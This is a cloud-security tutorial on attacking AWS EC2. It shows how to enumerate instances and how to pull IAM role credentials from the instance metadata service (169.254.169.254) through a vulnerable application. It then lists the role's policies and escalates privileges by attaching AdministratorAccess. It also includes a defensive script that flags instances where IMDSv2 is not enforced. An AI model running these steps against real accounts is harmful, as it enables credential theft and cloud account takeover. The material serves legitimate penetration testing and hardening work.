💻 EC2

📚 What is EC2?

Amazon Elastic Compute Cloud (EC2) is a web service that provides resizable compute capacity in the cloud. It is designed to make web-scale cloud computing easier for developers.

Enumerating EC2 Instances

To enumerate the EC2 instances in an organization's AWS account, you can use the AWS CLI. The following command lists all the instances visible to the specified profile:

```bash
aws ec2 describe-instances --profile auditor
```

Exploiting Public-Facing Applications Running on EC2 Instances

Retrieving Temporary Credentials

EC2 instances can be configured with IAM roles that provide temporary credentials. These credentials are accessible from the instance metadata service. If an application running on an EC2 instance is publicly accessible and vulnerable, an attacker can exploit it to retrieve these credentials.

To retrieve the temporary credentials, you can use the following command, where `ec2-role` is the name of the role attached to the instance:

```bash
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role
```

The response will be in the following format:

```json
{
  "Code" : "Success",
  "LastUpdated" : "2024-06-24T06:40:51Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAUI7[...]",
  "SecretAccessKey" : "bRF9sLI[...]",
  "Token" : "IQoJb3JpZ2luX2VjEPf[...]",
  "Expiration" : "2024-06-24T13:07:29Z"
}
```
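As an added example (not part of the original page): the single GET request shown above only returns credentials when the instance still accepts IMDSv1 requests. The Python below reads `aws ec2 describe-instances` output and flags instances that have a role attached and do not enforce IMDSv2 (`MetadataOptions.HttpTokens` set to `required`); the sample data and the function name `imdsv1_role_exposure` are constructed for illustration.

```python
import json

# Constructed sample in the shape of `aws ec2 describe-instances` output.
# Instance IDs, account ID and IPs are placeholders, not real data.
SAMPLE = json.loads("""
{"Reservations": [{"Instances": [
  {"InstanceId": "i-0aaaaaaaaaaaaaaa1", "State": {"Name": "running"},
   "PublicIpAddress": "203.0.113.10",
   "IamInstanceProfile": {"Arn": "arn:aws:iam::111122223333:instance-profile/ec2-role"},
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional"}},
  {"InstanceId": "i-0bbbbbbbbbbbbbbb2", "State": {"Name": "running"},
   "IamInstanceProfile": {"Arn": "arn:aws:iam::111122223333:instance-profile/ec2-role"},
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional"}},
  {"InstanceId": "i-0ccccccccccccccc3", "State": {"Name": "running"},
   "PublicIpAddress": "203.0.113.11",
   "IamInstanceProfile": {"Arn": "arn:aws:iam::111122223333:instance-profile/ec2-role"},
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required"}},
  {"InstanceId": "i-0ddddddddddddddd4", "State": {"Name": "running"},
   "PublicIpAddress": "203.0.113.12",
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional"}}
]}]}
""")

def imdsv1_role_exposure(doc):
    """Return [(instance_id, severity, profile_arn)] for instances whose role
    credentials can be read with an unauthenticated GET to the metadata service."""
    findings = []
    for reservation in doc.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            profile = inst.get("IamInstanceProfile")
            md = inst.get("MetadataOptions", {})
            if inst.get("State", {}).get("Name") == "terminated" or not profile:
                continue  # no live instance or no role: nothing to steal
            if md.get("HttpEndpoint") == "disabled" or md.get("HttpTokens") == "required":
                continue  # endpoint off, or IMDSv2 session token enforced
            # A public address makes an internet-facing vulnerable app more likely.
            severity = "high" if inst.get("PublicIpAddress") else "medium"
            findings.append((inst["InstanceId"], severity, profile["Arn"]))
    # High-severity findings first, then by instance ID.
    return sorted(findings, key=lambda f: (f[1] != "high", f[0]))

if __name__ == "__main__":
    # Live use: aws ec2 describe-instances --profile auditor > instances.json
    for instance_id, severity, arn in imdsv1_role_exposure(SAMPLE):
        print(f"{severity:6} {instance_id} {arn}")
```

Flagged instances can be moved to IMDSv2 with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required`, after confirming that the applications on them use an SDK that requests session tokens.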

Getting the Managed Policy Attached to EC2 Instance

Once you have retrieved the temporary credentials, you can use them to further enumerate and interact with AWS resources. To get the managed policies attached to the EC2 instance role, use the following command:

```bash
aws iam list-attached-role-policies --role-name ec2-role --profile auditor
```

Retrieving Inline Policies

To retrieve inline policies that are directly attached to the EC2 instance role, use the following commands:

  • List the inline policies attached to the role:

```bash
aws iam list-role-policies --role-name ec2-role --profile auditor
```

  • Get the permissions defined in an inline policy:

```bash
aws iam get-role-policy --role-name ec2-role --policy-name inline-policy --profile auditor
```

Attaching Administrator Policy

If you have sufficient permissions, you can escalate privileges by attaching an administrator policy to the role. This can give you full access to all AWS resources.

To attach the AdministratorAccess policy to the EC2 instance role, use the following command:

```bash
aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name ec2-role --profile auditor
```